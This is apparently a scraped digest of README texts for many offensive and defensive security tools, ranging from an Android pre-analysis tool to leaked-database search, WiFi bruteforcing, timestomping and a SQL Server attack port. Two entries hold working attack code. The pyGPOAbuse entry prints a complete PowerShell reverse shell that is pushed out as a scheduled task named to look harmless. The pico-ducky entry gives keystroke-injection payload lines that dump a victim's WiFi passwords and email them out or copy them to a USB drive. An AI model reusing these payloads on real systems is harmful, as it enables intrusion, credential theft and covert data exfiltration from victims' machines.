DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.
DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
Install Android disassembly tools
Apktool ,
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
Install from Git in a Python virtual environment (python3 -m venv
, or pyenv virtual environments etc).
$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis
Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis
).
conf/general.conf
. In particular make sure to change /home/axelle
with your appropriate directories.[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
python3 ./droidlysis3.py --help
The configuration file is ./conf/general.conf
(you can switch to another file with the --config
option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf
, ./conf/wide.conf
, ./conf/arm.conf
, ./conf/kit.conf
) and the name of the database file (only used if you specify --enable-sql
)
Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.
DroidLysis uses Python 3. To launch it and get options:
droidlysis --help
For example, test it on Signal's APK:
droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf
DroidLysis outputs:
--output /tmp
, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290
.droidlysis.db
) containing properties it noticed.Get usage with droidlysis --help
The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.
When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein
. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput
. If you want to store all statistics in a SQL database, use --enable-sql
(see here)
DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon
.
DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception
. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).
--output DIR
)This directory contains (when applicable):
AndroidManifest.xml
res
lib
, assets assets
smali
(and others)META-INF
./unzipped
classes.dex
(and others), and converted to jar: classes-dex2jar.jar
, and unjarred in ./unjarred
The following files are generated by DroidLysis:
autoanalysis.md
: lists each pattern DroidLysis detected and where.report.md
: same as what was printed on the consoleIf you do not need the sample output directory to be generated, use the option --clearoutput
.
--import-exodus
)$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf
Trackers from Exodus which are not present in your initial kit.conf
are appended to ~/.cache/droidlysis/kit.conf
. Diff the 2 files and check what trackers you wish to add.
If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql
. This will automatically dump all results in a database named droidlysis.db
, in a table named samples
. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.
For example, to retrieve all filename, SHA256 sum and smali properties of the database:
sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
What DroidLysis detects can be configured and extended in the files of the ./conf
directory.
A pattern consist of:
send_sms
. This is to name the property. Must be unique across the .conf
file.;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
. In the smali.conf
file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf
. Add option --import_exodus
to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf
. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf
.
Afterwards, you may want to sort your kit.conf
file:
import configparser
import collections
import os
config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)
Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.
In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.
This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
requirements.txt
git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse
pip install -r requirements.txt
Install Pentest Muse as a Python Package:
pip install .
In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:
python run_app.py
or
pmuse
You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:
python run_app.py agent
or
pmuse agent
You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.
Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key]
when starting the program.
For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
jython-standalone-2.7.3.jar
.java -jar jython-standalone-2.7.3.jar -m ensurepip
.GAP.py
and requirements.txt
from this project and place in the same directory.java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt
.Or you can right click a request or response in any other context and select GAP from the Extensions menu.
If you don't need one of the modes, then un-check it as results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.
If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl
button and click the GAP logo header image to remove it to make more space.
The Words mode uses the beautifulsoup4
library and this can be quite slow, so be patient!
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
Tentaive
Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).beautifulsoup4
that is faster to parse responses for Words.Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β (I could use the caffeine!)
π€ /XNL-h4ck3r
DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.
Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.
First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:
git clone https://github.com/luijait/DarkGPT.git cd DarkGPT
You will need to set up some environment variables for the script to work correctly. Copy the .env.example
file to a new file named .env
:
DEHASHED_API_KEY="your_dehashed_api_key_here"
This project requires certain Python packages to run. Install them by running the following command:
pip install -r requirements.txt 4. Then Run the project: python3 main.py
WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.
The packages are minimal or nearly none π . The package install command is:
pip install rich pyfiglet
Thats it.
So listing the features:
rich
.So this is how the bruteforcer works:
Provide Interface:
The user is required to provide the network interface for the tool to use.
By default, the interface is set to Wi-Fi
.
Search and Set Target:
The user must search for and select the target network.
During this process, the tool performs the following sub-steps:
Input Password File:
The user inputs the path to the password file.
The default path for the password file is ./wordlist/default.txt
.
Run the Attack:
With the target set and the password file ready, the tool is now prepared to initiate the attack.
Attack Procedure:
After installing all the packages just run python main.py
rest is history π make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:
For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/LeakSearch
_ _ ____ _
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|
------------------- by @JoelGMSec -------------------
usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]
options:
-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)
https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
New bug bounty(vulnerabilities) collector
# python3 main.py
*2024-02-20 16:14:47.836189*
1. Arbitrary File Reading due to Lack of Input Filepath Validation
- Feb 6th 2024 / High (CVE-2024-0964)
- gradio-app/gradio
- https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
2. View Barcode Image leads to Remote Code Execution
- Jan 31st 2024 / Critical (CVE: Not yet)
- dolibarr/dolibarr
- https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
(delimiter-based file database)
# vim feeds.db
1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/
BackdoorSim
is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer
and BackdoorClient
. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.
This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.
To set up BackdoorSim
, you will need to install it on both the server and client machines.
shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git
shell $ cd BackDoorSim
shell $ pip install -r requirements.txt
After starting both the server and client, you can use the following commands in the server's command prompt:
upload [file_path]
: Upload a file to the client.download [file_path]
: Download a file from the client.screenshot
: Capture a screenshot from the client.sysinfo
: Get system information from the client.securityinfo
: Get security software status from the client.camshot
: Capture an image from the client's webcam.notify [title] [message]
: Send a notification to the client.help
: Display the help menu.BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool
If you want to read our article about Backdoor
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.
For any inquiries or further information, you can reach me through the following channels:
SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.
git clone https://github.com/HalilDeniz/SpeedyTest.git
Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:
pip install -r requirements.txt
Run the following command to perform a speed test:
python3 speendytest.py
Receiving data \
Speed test completed!
Speed test time: 20.22 second
Server : Farknet - Konya
IP Address: speedtest.farknet.com.tr:8080
Country : Turkey
City : Konya
Ping : 20.41 ms
Download : 90.12 Mbps
Loading : 20 Mbps
Contributions are welcome! To contribute to SpeedyTest, follow these steps:
If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:
SpeedyTest is released under the MIT License. See LICENSE for details.
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
$ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py
Execute code within Azure Automation service without getting charged
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
requirements.txt
pip install .
usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
utomationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
-Path
: The path to the file or directory whose timestamps you wish to modify.-NewTimestamp
: The new DateTime value you wish to set for the file or directory.-Credentials
: (Optional) If you need to specify a different user's credentials.-Recurse
: (Switch) If specified, apply the timestamp recursively to all files in the given directory.Specify the -Recurse
switch to apply timestamps recursively:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Uscrapper extracts the following details from the provided website:
Uscrapper 2.0:
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems
To run Uscrapper, use the following command-line syntax:
python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]
Arguments:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.
Python partial implementation of SharpGPOAbuse by@pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
Reverse shell example
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
Β
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING
command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
ο Note:
After sending data over the email, the
.txt
file is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo |
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
Wireless_Network_Name Password | |
--------------------- -------- | |
WLAN1 pass1 | |
WLAN2 pass2 | |
WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
ο‘ Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock
is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock
bug.sudo
.Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.
Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
python3 pantheon.py
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)
(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).
Adjust the map as you please to see the markers.
The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
MIT License
Copyright (c) Josh Schiavone
PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.
PySQLRecon can be installed with pip3 install pysqlrecon
or by cloning this repository and running pip3 install .
All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV]
require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM]
can likely be run by normal users and do not require elevated privileges.
Support for impersonation ([I]
) or execution on linked servers ([L]
) are denoted at the end of the command description.
adsi [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
